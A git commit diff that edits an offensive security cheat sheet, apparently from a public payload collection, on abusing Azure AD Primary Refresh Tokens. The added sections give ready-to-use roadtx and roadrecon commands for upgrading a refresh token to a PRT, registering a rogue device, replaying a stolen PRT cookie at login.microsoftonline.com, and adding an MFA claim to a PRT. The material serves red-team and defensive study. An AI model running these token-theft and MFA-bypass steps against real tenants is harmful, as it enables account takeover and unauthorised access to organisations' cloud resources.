PRT and MFA

pull/1/head
Swissky 2023-11-22 16:54:23 +01:00
parent e1341751c3
commit 8a4e7f82ae
1 changed files with 21 additions and 14 deletions

View File

@ -89,6 +89,8 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
## Primary Refresh Token ## Primary Refresh Token
A Primary Refresh Token (PRT) is a key artifact in the authentication and identity management process in Microsoft's Azure AD (Azure Active Directory) environment. The PRT is primarily used for maintaining a seamless sign-in experience on devices.
* Use PRT token * Use PRT token
```ps1 ```ps1
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <session-key> roadtx browserprtauth --prt <prt-token> --prt-sessionkey <session-key>
@ -112,21 +114,12 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
* No method known to date. * No method known to date.
### Upgrade Refresh Token to PRT ### Use PRT cookie
```ps1 * `roadrecon auth prt-init`
# Get correct token audience * Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof)
roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file * `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug`
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
# Registering device
roadtx device -a register -n <device-name>
# Request PRT
roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key
# Use a PRT
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
### Request a PRT with Hybrid Device ### Request a PRT with Hybrid Device
@ -146,6 +139,20 @@ Use the user account to create a computer and request a PRT
``` ```
### Upgrade Refresh Token to PRT
* Get correct token audience: `roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file`
* Registering device: `roadtx device -a register -n <device-name>`
* Request PRT `roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key`
* Use a PRT: `roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com`
### Enriching a PRT with MFA claim
* Request a special refresh token: `roadtx prtenrich -u username@domain`
* Request a PRT with MFA claim: `roadtx prt -r <refreshtoken> -c <device>.pem -k <device>.key`
## References ## References
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0) * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)